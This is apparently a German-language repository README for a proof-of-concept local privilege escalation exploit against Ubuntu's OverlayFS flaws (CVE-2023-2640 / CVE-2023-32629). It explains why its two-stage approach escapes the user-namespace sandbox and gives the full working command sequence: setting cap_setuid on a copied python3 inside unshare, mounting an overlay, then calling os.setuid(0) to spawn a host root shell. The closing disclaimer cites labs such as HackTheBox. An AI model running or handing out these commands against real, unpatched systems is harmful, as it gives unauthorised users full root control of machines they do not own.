
Ein sauberer, interaktiver mehrstufiger Exploit zur lokalen Privilegienausweitung (LPE) für Ubuntu OverlayFS (GameOver(lay)), der aus der User-Namespace-Sandbox ausbricht, um eine echte Host-Root-Shell zu erhalten.
Ein interaktiver, mehrstufiger Proof of Concept (PoC) zur lokalen Privilegienausweitung (Local Privilege Escalation, LPE), der sich gegen die OverlayFS-Schwachstellen des Ubuntu-Linux-Kernels (CVE-2023-2640 / CVE-2023-32629) richtet.
Im Gegensatz zu standardmäßigen automatisierten Einzeilern, die Ihre interaktive Shell in einem restriktiven User Namespace (Fake Root) gefangen halten, zerlegt diese Methodik die Exploit-Sequenz, um sicher eine echte, uneingeschränkte Host-Root-Shell zu erhalten.
Viele öffentliche Exploits kombinieren Einrichtung und Ausführung in einer einzigen automatisierten Shell-Sequenz wie dieser:
unshare -rm sh -c "mkdir l u w m && ... && touch m/*; python3 -c '...'"
Da das Python-Ausführungspayload in die doppelten Anführungszeichen von unshare eingebettet ist, wird es intern innerhalb der User-Namespace-Sandbox ausgeführt.
uid=0(root) angezeigt, aber Ihre Shell ist kryptografisch vom Host isoliert. Wenn Sie versuchen, das Host-Root-Verzeichnis anzuzeigen (cd /root), erhalten Sie einen Permission Denied-Fehler.Dieser PoC zerlegt den Prozess in zwei klar getrennte logische Phasen:
unshare aus, um Root-Berechtigungen nur gerade lange genug vorzutäuschen, um den OverlayFS-Fehler ovl_copy_up auszunutzen und eine hochprivilegierte setcap cap_setuid+eip-Capability in einen lokalen Ordner mit Python-Binärdateien einzuschleusen.os.setuid(0) und verleiht Ihnen echte Systemadministratorrechte auf Host-Ebene.ovl_copy_up_meta_inode_data des Ubuntu-Kernels, der es ermöglicht, Validierungsprüfungen während der Dateimigration vollständig zu umgehen.6.2.0-26-generic.exploit.sh auf das Zielsystem herunter (z. B. nach /tmp).chmod +x exploit.sh
./exploit.sh
Wenn Sie über eine instabile Reverse Shell arbeiten, führen Sie diese Befehle vollständig getrennt aus und drücken Sie nach jeder Zeile Enter:
# 1. Clean workspace environment
cd /tmp && rm -rf l u w m
# 2. Forge the backdoor within the temporary namespace sandbox
unshare -rm sh -c "mkdir l u w m && cp /usr/bin/python3 l/ && setcap cap_setuid+eip l/python3 && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*"
# 3. Trigger execution on the real host to claim true root
./u/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Überprüfen Sie Ihre echten Berechtigungen, indem Sie Ihr aktuelles Benutzerprofil anzeigen:
whoami
cat /root/root.txt
Die grundlegenden Exploit-Mechanismen, die in diesem interaktiven Refactoring verwendet werden, wurden ursprünglich von den Sicherheitsforschern Liav Eliyahu und g1vi entdeckt und dokumentiert.
Dieses Repository wurde ausschließlich für Bildungszwecke, Sicherheitsforschung und autorisierte Penetrationstests (z. B. HackTheBox-/OffSec-Labore) erstellt. Der Autor übernimmt keine Haftung für Missbrauch, unbefugte Zugriffsversuche oder Infrastrukturschäden, die durch dieses Material verursacht werden. Verwenden Sie es verantwortungsbewusst.